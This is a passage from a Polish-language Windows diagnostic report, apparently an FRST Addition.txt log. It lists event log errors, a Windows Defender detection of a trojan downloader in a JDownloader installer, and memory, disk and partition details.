Pre-Junkware Removal"; Opis = JRT Pre-Junkware Removal; Błąd = 0x8007043c). Error: (12/21/2018 10:20:48 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: HitmanPro_x64.exe, wersja: 3.8.0.295, sygnatura czasowa: 0x5b337e78 Nazwa modułu powodującego błąd: HitmanPro_x64.exe, wersja: 3.8.0.295, sygnatura czasowa: 0x5b337e78 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00000000002c2715 Identyfikator procesu powodującego błąd: 0x74c Godzina uruchomienia aplikacji powodującej błąd: 0x01d4990def19d878 Ścieżka aplikacji powodującej błąd: C:\Users\pc\Desktop\HitmanPro_x64.exe Ścieżka modułu powodującego błąd: C:\Users\pc\Desktop\HitmanPro_x64.exe Identyfikator raportu: b33a95b7-0501-11e9-a2c9-d0509985d86a Error: (12/21/2018 10:11:11 AM) (Source: MsiInstaller) (EventID: 11704) (User: pc-Komputer) Description: Produkt: AMD Catalyst Install Manager -- Błąd 1704. Instalacja JbejkGYEklfajifwgw jest w tej chwili wstrzymana. Przed kontynuacją musisz cofnąć zmiany dokonane przez tę instalację. Chcesz cofnąć zmiany? Error: (12/21/2018 10:11:06 AM) (Source: System Restore) (EventID: 8193) (User: ) Description: Nie można utworzyć punktu przywracania (Proces = C:\Users\pc\Desktop\amdcleanuputility-x64.exe ; Opis = AMDCleanupUtility Restore Point; Błąd = 0x8007043c). Error: (12/20/2018 02:03:20 PM) (Source: a2service.exe) (EventID: 0) (User: ) Description: Event-ID 0 Dziennik System: ============= Error: (12/21/2018 11:02:28 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Dostawca grupy domowej zależy od usługi Host dostawcy odnajdowania funkcji, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Error: (12/21/2018 11:02:27 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi WSearch z argumentami w celu uruchomienia serwera: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} Error: (12/21/2018 11:02:27 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi WSearch z argumentami w celu uruchomienia serwera: {9E175B6D-F52A-11D8-B9A5-505054503030} Error: (12/21/2018 11:02:26 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi EventSystem z argumentami w celu uruchomienia serwera: {1BE1F766-5536-11D1-B726-00C04FB926AF} Error: (12/21/2018 11:02:20 AM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: discache epp spldr Wanarpv6 Error: (12/21/2018 11:00:53 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: Serwer {3EB3C877-1F16-487C-9050-104DBCD66683} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (12/21/2018 11:00:40 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Usługa listy sieci zależy od usługi Rozpoznawanie lokalizacji w sieci, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Error: (12/21/2018 11:00:40 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Usługa listy sieci zależy od usługi Rozpoznawanie lokalizacji w sieci, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Windows Defender: =================================== Date: 2018-10-27 13:33:36.967 Description: Podczas skanowania produktu Windows Defender wykryto program szpiegujący lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:Win32/Renos&threatid=16054 Nazwa:TrojanDownloader:Win32/Renos Id.:16054 Ważność:Poważny Kategoria:Koń trojański pobierający inne programy Znaleziona ścieżka:containerfile:C:\Users\pc\Desktop\JDownloaderSetup_0.9581(dobreprogramy.pl).exe;file:C:\Users\pc\Desktop\JDownloaderSetup_0.9581(dobreprogramy.pl).exe->(nsis-3-installer.exe);process:pid:4800;process:pid:4800,ProcessStart:131851134193752000 Typ wykrycia:Konkretne Źródło wykrycia:System Stan:Nieznane Użytkownik:ZARZĄDZANIE NT\SYSTEM Nazwa procesu: CodeIntegrity: =================================== Date: 2018-12-20 14:04:11.908 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Emsisoft Anti-Malware\a2hooks64.dll because the set of per-page image hashes could not be found on the system. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i7-7700K CPU @ 4.20GHz Procent pamięci w użyciu: 15% Całkowita pamięć fizyczna: 16328.52 MB Dostępna pamięć fizyczna: 13866.81 MB Całkowita pamięć wirtualna: 29588.64 MB Dostępna pamięć wirtualna: 27209.72 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:223.47 GB) (Free:0.99 GB) NTFS \\?\Volume{b9cd9a43-b454-11e8-a724-806e6f6e6963}\ (Zastrzeżone przez system) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 723B5DF9) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=223.5 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================